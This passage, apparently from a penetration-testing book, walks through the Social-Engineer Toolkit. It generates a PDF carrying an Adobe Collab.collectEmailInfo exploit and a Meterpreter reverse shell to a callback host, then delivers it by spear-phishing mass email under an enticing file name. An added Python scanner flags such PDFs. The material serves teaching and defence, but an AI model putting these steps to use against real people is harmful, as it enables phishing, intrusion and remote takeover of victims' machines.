The Social-Engineer Toolkit
139
3. Windows Reverse VNC DLL                Spawn a VNC server on victim and send back to attacker.
4. Windows Reverse TCP Shell (x64)        Windows X64 Command Shell, Reverse TCP Inline
5. Windows Meterpreter Reverse_TCP (X64)  Connect back to the attacker (Windows x64), Meterpreter
6. Windows Shell Bind_TCP (X64)           Execute payload and create an accepting port on remote system.
7. Windows Meterpreter Reverse HTTPS      Tunnel communication over HTTP using SSL and use Meterpreter.
Enter the payload you want (press enter for default):
[*] Windows Meterpreter Reverse TCP selected.
Enter the port to connect back on (press enter for default):
[*] Defaulting to port 443...
[*] Generating fileformat exploit...
[*] Please wait while we load the module tree...
[*] Started reverse handler on 10.10.1.112:443
[*] Creating 'template.pdf' file...
[*] Generated output file /pentest/exploits/set/src/program_junk/template.pdf
[*] Payload creation complete.
[*] All payloads get sent to the src/msf_attacks/template.pdf directory
[*] Payload generation complete. Press enter to continue.
As an added bonus, use the file-format creator in SET to create your attachment.
Right now the attachment will be imported with filename of 'template.whatever'
Do you want to rename the file?
example Enter the new filename: moo.pdf
1. Keep the filename, I don't care.
2. Rename the file, I want to be cool.
Enter your choice (enter for default):
1
Keeping the filename and moving on.
From the SET main menu, select Spear-Phishing Attack Vectors followed by Perform a Mass Email Attack. This attack infects a PDF file using the Adobe Collab.collectEmailInfo vulnerability and delivers a Metasploit Meterpreter reverse payload, which is the SET default. Collab.collectEmailInfo is a heap-based exploit that, if the PDF is opened (and if the target's version of Adobe Acrobat is vulnerable to it), will connect back to the attacking workstation on port 443, a port that most networks usually allow outbound.

You are also given the option of renaming the malicious file to make it more enticing for the target to open. The default name (template.pdf) is kept in this scenario for demonstration purposes.
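The defender's counterpart to the attack just described, as an added example that is not from the book or from SET: a small Python triage scanner that inflates a PDF's FlateDecode streams and flags documents whose JavaScript references Collab.collectEmailInfo or is wired to an OpenAction. The sample PDF bytes are constructed inline for the test; they contain only the API name and no exploit code.

```python
import re
import zlib

# Constructed fixture: a minimal PDF-shaped byte string with an OpenAction that
# points at a FlateDecode JavaScript stream naming Collab.collectEmailInfo.
# It holds only the API name, not exploit code, and is not a valid document.
JS_BODY = b'app.alert("benign"); Collab.collectEmailInfo({});'
COMPRESSED = zlib.compress(JS_BODY)
SAMPLE_PDF = b"".join([
    b"%PDF-1.4\n",
    b"1 0 obj << /Type /Catalog /OpenAction 2 0 R >> endobj\n",
    b"2 0 obj << /S /JavaScript /JS 3 0 R >> endobj\n",
    b"3 0 obj << /Length %d /Filter /FlateDecode >>\nstream\n" % len(COMPRESSED),
    COMPRESSED,
    b"\nendstream\nendobj\n%%EOF\n",
])

STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)
INDICATORS = (b"/OpenAction", b"/JavaScript", b"/JS", b"Collab.collectEmailInfo")


def decoded_views(data: bytes):
    """Yield the raw file plus the inflated body of every zlib stream found."""
    yield data
    for m in STREAM_RE.finditer(data):
        try:
            yield zlib.decompress(m.group(1))
        except zlib.error:
            continue  # other filter or uncompressed; the raw view already covers it


def scan_pdf(data: bytes) -> dict:
    """Count each indicator across the raw bytes and all inflated streams."""
    hits = {ind.decode(): 0 for ind in INDICATORS}
    for view in decoded_views(data):
        for ind in INDICATORS:
            hits[ind.decode()] += view.count(ind)
    return hits


def is_suspicious(data: bytes) -> bool:
    """Flag a direct collectEmailInfo reference, or JavaScript combined with OpenAction."""
    h = scan_pdf(data)
    has_js = h["/JavaScript"] + h["/JS"] > 0
    return h["Collab.collectEmailInfo"] > 0 or (has_js and h["/OpenAction"] > 0)


if __name__ == "__main__":
    print(scan_pdf(SAMPLE_PDF), is_suspicious(SAMPLE_PDF))
```

String matching on inflated streams is first-pass triage only: obfuscated or string-assembled JavaScript will not contain the literal API name, which is why the JavaScript-plus-OpenAction rule is kept as a second signal.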
Social Engineer Toolkit Mass E-Mailer
There are two options on the mass e-mailer, the first would
be to send an email to one individual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.